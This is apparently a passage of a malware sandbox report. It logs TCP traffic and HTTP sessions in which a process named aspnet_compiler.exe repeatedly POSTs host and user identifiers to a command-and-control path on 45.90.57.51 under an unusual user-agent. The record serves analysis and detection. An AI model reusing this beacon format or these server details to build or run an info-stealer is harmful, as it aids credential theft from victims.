                  May 16, 2024 00:38:15.940726995 CEST804975645.90.57.51192.168.2.5
                  May 16, 2024 00:38:15.940907955 CEST4975680192.168.2.545.90.57.51
                  May 16, 2024 00:38:16.182723999 CEST804975645.90.57.51192.168.2.5
                  May 16, 2024 00:38:16.216450930 CEST804975645.90.57.51192.168.2.5
                  May 16, 2024 00:38:16.216469049 CEST804975645.90.57.51192.168.2.5
                  May 16, 2024 00:38:16.216542006 CEST4975680192.168.2.545.90.57.51
                  May 16, 2024 00:38:16.216624022 CEST4975680192.168.2.545.90.57.51
                  May 16, 2024 00:38:16.457804918 CEST804975645.90.57.51192.168.2.5
                  May 16, 2024 00:38:17.365760088 CEST4975780192.168.2.545.90.57.51
                  May 16, 2024 00:38:17.601481915 CEST804975745.90.57.51192.168.2.5
                  May 16, 2024 00:38:17.601697922 CEST4975780192.168.2.545.90.57.51
                  May 16, 2024 00:38:17.603709936 CEST4975780192.168.2.545.90.57.51
                  May 16, 2024 00:38:17.851507902 CEST804975745.90.57.51192.168.2.5
                  May 16, 2024 00:38:17.851574898 CEST4975780192.168.2.545.90.57.51
                  May 16, 2024 00:38:18.100068092 CEST804975745.90.57.51192.168.2.5
                  May 16, 2024 00:38:18.130280972 CEST804975745.90.57.51192.168.2.5
                  May 16, 2024 00:38:18.130296946 CEST804975745.90.57.51192.168.2.5
                  May 16, 2024 00:38:18.130347967 CEST4975780192.168.2.545.90.57.51
                  May 16, 2024 00:38:18.130388021 CEST4975780192.168.2.545.90.57.51
                  May 16, 2024 00:38:18.366137028 CEST804975745.90.57.51192.168.2.5
                  May 16, 2024 00:38:19.277903080 CEST4975880192.168.2.545.90.57.51
                  May 16, 2024 00:38:19.512327909 CEST804975845.90.57.51192.168.2.5
                  May 16, 2024 00:38:19.512438059 CEST4975880192.168.2.545.90.57.51
                  May 16, 2024 00:38:19.541568995 CEST4975880192.168.2.545.90.57.51
                  May 16, 2024 00:38:19.775789976 CEST804975845.90.57.51192.168.2.5
                  May 16, 2024 00:38:19.775937080 CEST4975880192.168.2.545.90.57.51
                  May 16, 2024 00:38:20.010289907 CEST804975845.90.57.51192.168.2.5
                  May 16, 2024 00:38:20.039736032 CEST804975845.90.57.51192.168.2.5
                  May 16, 2024 00:38:20.039757967 CEST804975845.90.57.51192.168.2.5
                  May 16, 2024 00:38:20.039849997 CEST4975880192.168.2.545.90.57.51
                  May 16, 2024 00:38:20.039908886 CEST4975880192.168.2.545.90.57.51
                  May 16, 2024 00:38:20.274548054 CEST804975845.90.57.51192.168.2.5
                  May 16, 2024 00:38:21.194191933 CEST4975980192.168.2.545.90.57.51
                  May 16, 2024 00:38:21.427762032 CEST804975945.90.57.51192.168.2.5
                  May 16, 2024 00:38:21.428050995 CEST4975980192.168.2.545.90.57.51
                  May 16, 2024 00:38:21.430033922 CEST4975980192.168.2.545.90.57.51
                  May 16, 2024 00:38:21.663431883 CEST804975945.90.57.51192.168.2.5
                  May 16, 2024 00:38:21.663501024 CEST4975980192.168.2.545.90.57.51
                  May 16, 2024 00:38:21.896893978 CEST804975945.90.57.51192.168.2.5
                  May 16, 2024 00:38:21.924787045 CEST804975945.90.57.51192.168.2.5
                  May 16, 2024 00:38:21.924801111 CEST804975945.90.57.51192.168.2.5
                  May 16, 2024 00:38:21.924875021 CEST4975980192.168.2.545.90.57.51
                  May 16, 2024 00:38:21.925137997 CEST4975980192.168.2.545.90.57.51
                  May 16, 2024 00:38:22.158421993 CEST804975945.90.57.51192.168.2.5
                  May 16, 2024 00:38:23.090498924 CEST4976080192.168.2.545.90.57.51
                  May 16, 2024 00:38:23.331087112 CEST804976045.90.57.51192.168.2.5
                  May 16, 2024 00:38:23.331195116 CEST4976080192.168.2.545.90.57.51
                  May 16, 2024 00:38:23.333174944 CEST4976080192.168.2.545.90.57.51
                  May 16, 2024 00:38:23.573436022 CEST804976045.90.57.51192.168.2.5
                  May 16, 2024 00:38:23.573502064 CEST4976080192.168.2.545.90.57.51
                  May 16, 2024 00:38:23.813911915 CEST804976045.90.57.51192.168.2.5
                  May 16, 2024 00:38:23.839876890 CEST804976045.90.57.51192.168.2.5
                  May 16, 2024 00:38:23.839893103 CEST804976045.90.57.51192.168.2.5
                  May 16, 2024 00:38:23.840059996 CEST4976080192.168.2.545.90.57.51
                  May 16, 2024 00:38:23.840137959 CEST4976080192.168.2.545.90.57.51
                  May 16, 2024 00:38:24.080715895 CEST804976045.90.57.51192.168.2.5
                  May 16, 2024 00:38:24.976531982 CEST4976180192.168.2.545.90.57.51
                  May 16, 2024 00:38:25.209379911 CEST804976145.90.57.51192.168.2.5
                  May 16, 2024 00:38:25.209805965 CEST4976180192.168.2.545.90.57.51
                  May 16, 2024 00:38:25.211848974 CEST4976180192.168.2.545.90.57.51
                  May 16, 2024 00:38:25.444511890 CEST804976145.90.57.51192.168.2.5
                  May 16, 2024 00:38:25.444598913 CEST4976180192.168.2.545.90.57.51
                  May 16, 2024 00:38:25.677463055 CEST804976145.90.57.51192.168.2.5
                  May 16, 2024 00:38:25.707920074 CEST804976145.90.57.51192.168.2.5
                  May 16, 2024 00:38:25.707942009 CEST804976145.90.57.51192.168.2.5
                  May 16, 2024 00:38:25.708097935 CEST4976180192.168.2.545.90.57.51
                  May 16, 2024 00:38:25.708144903 CEST4976180192.168.2.545.90.57.51
                  May 16, 2024 00:38:25.940809011 CEST804976145.90.57.51192.168.2.5
                  May 16, 2024 00:38:26.850564957 CEST4976280192.168.2.545.90.57.51
                  May 16, 2024 00:38:27.083501101 CEST804976245.90.57.51192.168.2.5
                  May 16, 2024 00:38:27.083594084 CEST4976280192.168.2.545.90.57.51
                  May 16, 2024 00:38:27.085627079 CEST4976280192.168.2.545.90.57.51
                  May 16, 2024 00:38:27.318443060 CEST804976245.90.57.51192.168.2.5
                  May 16, 2024 00:38:27.318540096 CEST4976280192.168.2.545.90.57.51
                  May 16, 2024 00:38:27.551465988 CEST804976245.90.57.51192.168.2.5
                  May 16, 2024 00:38:27.575263977 CEST804976245.90.57.51192.168.2.5
                  May 16, 2024 00:38:27.575279951 CEST804976245.90.57.51192.168.2.5
                  May 16, 2024 00:38:27.575349092 CEST4976280192.168.2.545.90.57.51
                  May 16, 2024 00:38:27.575382948 CEST4976280192.168.2.545.90.57.51
                  May 16, 2024 00:38:27.808176041 CEST804976245.90.57.51192.168.2.5
                  May 16, 2024 00:38:28.710491896 CEST4976380192.168.2.545.90.57.51
                  May 16, 2024 00:38:28.949769974 CEST804976345.90.57.51192.168.2.5
                  May 16, 2024 00:38:28.949872971 CEST4976380192.168.2.545.90.57.51
                  May 16, 2024 00:38:28.951649904 CEST4976380192.168.2.545.90.57.51
                  May 16, 2024 00:38:29.190588951 CEST804976345.90.57.51192.168.2.5
                  May 16, 2024 00:38:29.190665960 CEST4976380192.168.2.545.90.57.51
                  May 16, 2024 00:38:29.429646969 CEST804976345.90.57.51192.168.2.5
                  May 16, 2024 00:38:29.456072092 CEST804976345.90.57.51192.168.2.5
                  May 16, 2024 00:38:29.456088066 CEST804976345.90.57.51192.168.2.5
                  May 16, 2024 00:38:29.456144094 CEST4976380192.168.2.545.90.57.51
                  May 16, 2024 00:38:29.456203938 CEST4976380192.168.2.545.90.57.51
                  May 16, 2024 00:38:29.695173979 CEST804976345.90.57.51192.168.2.5
                  May 16, 2024 00:38:30.653187990 CEST4976480192.168.2.545.90.57.51
                  May 16, 2024 00:38:30.891596079 CEST804976445.90.57.51192.168.2.5
                  May 16, 2024 00:38:30.892734051 CEST4976480192.168.2.545.90.57.51
                  May 16, 2024 00:38:30.894418001 CEST4976480192.168.2.545.90.57.51
                  May 16, 2024 00:38:31.133104086 CEST804976445.90.57.51192.168.2.5
                  May 16, 2024 00:38:31.136183023 CEST4976480192.168.2.545.90.57.51
                  May 16, 2024 00:38:31.374516964 CEST804976445.90.57.51192.168.2.5
                  May 16, 2024 00:38:31.400897026 CEST804976445.90.57.51192.168.2.5
                  May 16, 2024 00:38:31.400917053 CEST804976445.90.57.51192.168.2.5
                  May 16, 2024 00:38:31.401062965 CEST4976480192.168.2.545.90.57.51
                  May 16, 2024 00:38:31.401094913 CEST4976480192.168.2.545.90.57.51
                  May 16, 2024 00:38:31.639385939 CEST804976445.90.57.51192.168.2.5
                  May 16, 2024 00:38:33.570050955 CEST4976580192.168.2.545.90.57.51
                  May 16, 2024 00:38:33.803917885 CEST804976545.90.57.51192.168.2.5
                  May 16, 2024 00:38:33.804022074 CEST4976580192.168.2.545.90.57.51
                  May 16, 2024 00:38:33.811515093 CEST4976580192.168.2.545.90.57.51
                  May 16, 2024 00:38:34.045082092 CEST804976545.90.57.51192.168.2.5
                  May 16, 2024 00:38:34.045253038 CEST4976580192.168.2.545.90.57.51
                  May 16, 2024 00:38:34.278907061 CEST804976545.90.57.51192.168.2.5
                  May 16, 2024 00:38:34.303761959 CEST804976545.90.57.51192.168.2.5
                  May 16, 2024 00:38:34.303776979 CEST804976545.90.57.51192.168.2.5
                  May 16, 2024 00:38:34.303842068 CEST4976580192.168.2.545.90.57.51
                  May 16, 2024 00:38:34.303874969 CEST4976580192.168.2.545.90.57.51
                  May 16, 2024 00:38:34.537519932 CEST804976545.90.57.51192.168.2.5
                  May 16, 2024 00:38:35.449434042 CEST4976680192.168.2.545.90.57.51
                  May 16, 2024 00:38:35.690562010 CEST804976645.90.57.51192.168.2.5
                  May 16, 2024 00:38:35.690819979 CEST4976680192.168.2.545.90.57.51
                  May 16, 2024 00:38:35.693093061 CEST4976680192.168.2.545.90.57.51
                  May 16, 2024 00:38:35.934561014 CEST804976645.90.57.51192.168.2.5
                  May 16, 2024 00:38:35.934741020 CEST4976680192.168.2.545.90.57.51
                  May 16, 2024 00:38:36.175793886 CEST804976645.90.57.51192.168.2.5
                  May 16, 2024 00:38:36.199531078 CEST804976645.90.57.51192.168.2.5
                  May 16, 2024 00:38:36.199546099 CEST804976645.90.57.51192.168.2.5
                  May 16, 2024 00:38:36.199604988 CEST4976680192.168.2.545.90.57.51
                  May 16, 2024 00:38:36.199640036 CEST4976680192.168.2.545.90.57.51
                  May 16, 2024 00:38:36.440793991 CEST804976645.90.57.51192.168.2.5
                  May 16, 2024 00:38:37.335086107 CEST4976780192.168.2.545.90.57.51
                  May 16, 2024 00:38:37.576050997 CEST804976745.90.57.51192.168.2.5
                  May 16, 2024 00:38:37.576148033 CEST4976780192.168.2.545.90.57.51
                  May 16, 2024 00:38:37.577907085 CEST4976780192.168.2.545.90.57.51
                  May 16, 2024 00:38:37.818468094 CEST804976745.90.57.51192.168.2.5
                  May 16, 2024 00:38:37.818737984 CEST4976780192.168.2.545.90.57.51
                  May 16, 2024 00:38:38.059351921 CEST804976745.90.57.51192.168.2.5
                  May 16, 2024 00:38:38.095021009 CEST804976745.90.57.51192.168.2.5
                  May 16, 2024 00:38:38.095036030 CEST804976745.90.57.51192.168.2.5
                  May 16, 2024 00:38:38.095289946 CEST4976780192.168.2.545.90.57.51
                  May 16, 2024 00:38:38.095289946 CEST4976780192.168.2.545.90.57.51
                  May 16, 2024 00:38:38.335969925 CEST804976745.90.57.51192.168.2.5
                  May 16, 2024 00:38:39.241533995 CEST4976880192.168.2.545.90.57.51
                  May 16, 2024 00:38:39.482846022 CEST804976845.90.57.51192.168.2.5
                  May 16, 2024 00:38:39.483068943 CEST4976880192.168.2.545.90.57.51
                  May 16, 2024 00:38:39.485061884 CEST4976880192.168.2.545.90.57.51
                  May 16, 2024 00:38:39.726262093 CEST804976845.90.57.51192.168.2.5
                  May 16, 2024 00:38:39.726444960 CEST4976880192.168.2.545.90.57.51
                  May 16, 2024 00:38:39.967730045 CEST804976845.90.57.51192.168.2.5
                  May 16, 2024 00:38:39.999092102 CEST804976845.90.57.51192.168.2.5
                  May 16, 2024 00:38:39.999108076 CEST804976845.90.57.51192.168.2.5
                  May 16, 2024 00:38:39.999165058 CEST4976880192.168.2.545.90.57.51
                  May 16, 2024 00:38:39.999182940 CEST4976880192.168.2.545.90.57.51
                  May 16, 2024 00:38:40.240436077 CEST804976845.90.57.51192.168.2.5
                  May 16, 2024 00:38:41.147964001 CEST4976980192.168.2.545.90.57.51
                  May 16, 2024 00:38:41.386671066 CEST804976945.90.57.51192.168.2.5
                  May 16, 2024 00:38:41.386781931 CEST4976980192.168.2.545.90.57.51
                  May 16, 2024 00:38:41.388890982 CEST4976980192.168.2.545.90.57.51
                  May 16, 2024 00:38:41.627513885 CEST804976945.90.57.51192.168.2.5
                  May 16, 2024 00:38:41.627592087 CEST4976980192.168.2.545.90.57.51
                  May 16, 2024 00:38:41.866436005 CEST804976945.90.57.51192.168.2.5
                  May 16, 2024 00:38:41.892699957 CEST804976945.90.57.51192.168.2.5
                  May 16, 2024 00:38:41.892788887 CEST804976945.90.57.51192.168.2.5
                  May 16, 2024 00:38:41.892901897 CEST4976980192.168.2.545.90.57.51
                  May 16, 2024 00:38:41.892901897 CEST4976980192.168.2.545.90.57.51
                  May 16, 2024 00:38:42.131936073 CEST804976945.90.57.51192.168.2.5
                  May 16, 2024 00:38:43.037225962 CEST4977080192.168.2.545.90.57.51
                  May 16, 2024 00:38:43.270157099 CEST804977045.90.57.51192.168.2.5
                  May 16, 2024 00:38:43.270369053 CEST4977080192.168.2.545.90.57.51
                  May 16, 2024 00:38:43.272419930 CEST4977080192.168.2.545.90.57.51
                  May 16, 2024 00:38:43.505177975 CEST804977045.90.57.51192.168.2.5
                  May 16, 2024 00:38:43.505400896 CEST4977080192.168.2.545.90.57.51
                  May 16, 2024 00:38:43.738454103 CEST804977045.90.57.51192.168.2.5
                  May 16, 2024 00:38:43.763044119 CEST804977045.90.57.51192.168.2.5
                  May 16, 2024 00:38:43.763061047 CEST804977045.90.57.51192.168.2.5
                  May 16, 2024 00:38:43.763149023 CEST4977080192.168.2.545.90.57.51
                  May 16, 2024 00:38:43.763190031 CEST4977080192.168.2.545.90.57.51
                  May 16, 2024 00:38:43.995958090 CEST804977045.90.57.51192.168.2.5
                  May 16, 2024 00:38:44.912992954 CEST4977180192.168.2.545.90.57.51
                  May 16, 2024 00:38:45.149470091 CEST804977145.90.57.51192.168.2.5
                  May 16, 2024 00:38:45.149554014 CEST4977180192.168.2.545.90.57.51
                  May 16, 2024 00:38:45.151547909 CEST4977180192.168.2.545.90.57.51
                  May 16, 2024 00:38:45.387909889 CEST804977145.90.57.51192.168.2.5
                  May 16, 2024 00:38:45.387999058 CEST4977180192.168.2.545.90.57.51
                  May 16, 2024 00:38:45.624524117 CEST804977145.90.57.51192.168.2.5
                  May 16, 2024 00:38:45.647664070 CEST804977145.90.57.51192.168.2.5
                  May 16, 2024 00:38:45.647680998 CEST804977145.90.57.51192.168.2.5
                  May 16, 2024 00:38:45.647849083 CEST4977180192.168.2.545.90.57.51
                  May 16, 2024 00:38:45.647849083 CEST4977180192.168.2.545.90.57.51
                  May 16, 2024 00:38:45.884411097 CEST804977145.90.57.51192.168.2.5
                  May 16, 2024 00:38:46.804820061 CEST4977280192.168.2.545.90.57.51
                  May 16, 2024 00:38:47.043612003 CEST804977245.90.57.51192.168.2.5
                  May 16, 2024 00:38:47.043720961 CEST4977280192.168.2.545.90.57.51
                  May 16, 2024 00:38:47.045717955 CEST4977280192.168.2.545.90.57.51
                  May 16, 2024 00:38:47.284423113 CEST804977245.90.57.51192.168.2.5
                  May 16, 2024 00:38:47.284497976 CEST4977280192.168.2.545.90.57.51
                  May 16, 2024 00:38:47.523185968 CEST804977245.90.57.51192.168.2.5
                  May 16, 2024 00:38:47.548430920 CEST804977245.90.57.51192.168.2.5
                  May 16, 2024 00:38:47.548451900 CEST804977245.90.57.51192.168.2.5
                  May 16, 2024 00:38:47.548520088 CEST4977280192.168.2.545.90.57.51
                  May 16, 2024 00:38:47.548564911 CEST4977280192.168.2.545.90.57.51
                  May 16, 2024 00:38:47.787358999 CEST804977245.90.57.51192.168.2.5
                  May 16, 2024 00:38:49.884792089 CEST4977380192.168.2.545.90.57.51
                  May 16, 2024 00:38:50.121382952 CEST804977345.90.57.51192.168.2.5
                  May 16, 2024 00:38:50.121503115 CEST4977380192.168.2.545.90.57.51
                  May 16, 2024 00:38:50.123310089 CEST4977380192.168.2.545.90.57.51
                  May 16, 2024 00:38:50.359729052 CEST804977345.90.57.51192.168.2.5
                  May 16, 2024 00:38:50.359797001 CEST4977380192.168.2.545.90.57.51
                  May 16, 2024 00:38:50.596263885 CEST804977345.90.57.51192.168.2.5
                  May 16, 2024 00:38:50.619827986 CEST804977345.90.57.51192.168.2.5
                  May 16, 2024 00:38:50.619844913 CEST804977345.90.57.51192.168.2.5
                  May 16, 2024 00:38:50.619904041 CEST4977380192.168.2.545.90.57.51
                  May 16, 2024 00:38:50.619944096 CEST4977380192.168.2.545.90.57.51
                  May 16, 2024 00:38:50.856313944 CEST804977345.90.57.51192.168.2.5
                  May 16, 2024 00:38:51.757445097 CEST4977480192.168.2.545.90.57.51
                  May 16, 2024 00:38:51.998290062 CEST804977445.90.57.51192.168.2.5
                  May 16, 2024 00:38:51.998395920 CEST4977480192.168.2.545.90.57.51
                  May 16, 2024 00:38:52.000180006 CEST4977480192.168.2.545.90.57.51
                  May 16, 2024 00:38:52.240910053 CEST804977445.90.57.51192.168.2.5
                  May 16, 2024 00:38:52.240966082 CEST4977480192.168.2.545.90.57.51
                  May 16, 2024 00:38:52.481700897 CEST804977445.90.57.51192.168.2.5
                  May 16, 2024 00:38:52.514468908 CEST804977445.90.57.51192.168.2.5
                  May 16, 2024 00:38:52.514503002 CEST804977445.90.57.51192.168.2.5
                  May 16, 2024 00:38:52.514672995 CEST4977480192.168.2.545.90.57.51
                  May 16, 2024 00:38:52.514672995 CEST4977480192.168.2.545.90.57.51
                  May 16, 2024 00:38:52.755438089 CEST804977445.90.57.51192.168.2.5
                  May 16, 2024 00:38:53.662473917 CEST4977580192.168.2.545.90.57.51
                  May 16, 2024 00:38:53.896270037 CEST804977545.90.57.51192.168.2.5
                  May 16, 2024 00:38:53.896378040 CEST4977580192.168.2.545.90.57.51
                  May 16, 2024 00:38:53.898130894 CEST4977580192.168.2.545.90.57.51
                  May 16, 2024 00:38:54.131948948 CEST804977545.90.57.51192.168.2.5
                  May 16, 2024 00:38:54.132042885 CEST4977580192.168.2.545.90.57.51
                  May 16, 2024 00:38:54.365803957 CEST804977545.90.57.51192.168.2.5
                  May 16, 2024 00:38:54.389626026 CEST804977545.90.57.51192.168.2.5
                  May 16, 2024 00:38:54.389652967 CEST804977545.90.57.51192.168.2.5
                  May 16, 2024 00:38:54.389714003 CEST4977580192.168.2.545.90.57.51
                  May 16, 2024 00:38:54.389744043 CEST4977580192.168.2.545.90.57.51
                  May 16, 2024 00:38:54.623433113 CEST804977545.90.57.51192.168.2.5
                  • 45.90.57.51
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.54970445.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:36:52.383820057 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 180
                  Connection: close
                  May 16, 2024 00:36:52.620201111 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: 'ckav.rualfons134349ALFONS-PCk0FDD42EE188E931437F4FBE2CgSS2l
                  May 16, 2024 00:36:52.880095959 CEST228INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:36:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 15
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.54970545.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:36:54.264581919 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 180
                  Connection: close
                  May 16, 2024 00:36:54.502151012 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: 'ckav.rualfons134349ALFONS-PC+0FDD42EE188E931437F4FBE2CSbg2v
                  May 16, 2024 00:36:54.765763998 CEST228INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:36:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 15
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.54970645.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:36:55.076783895 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:36:55.320893049 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:36:55.590960979 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:36:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.54970745.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:36:56.970973015 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:36:57.212929964 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:36:57.478820086 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:36:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.54970845.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:36:58.862052917 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:36:59.103864908 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:36:59.369699001 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:36:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.54970945.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:00.746099949 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:00.980633020 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:01.238713026 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.54971045.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:02.627301931 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:02.870373011 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:03.138281107 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.54971145.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:04.537805080 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
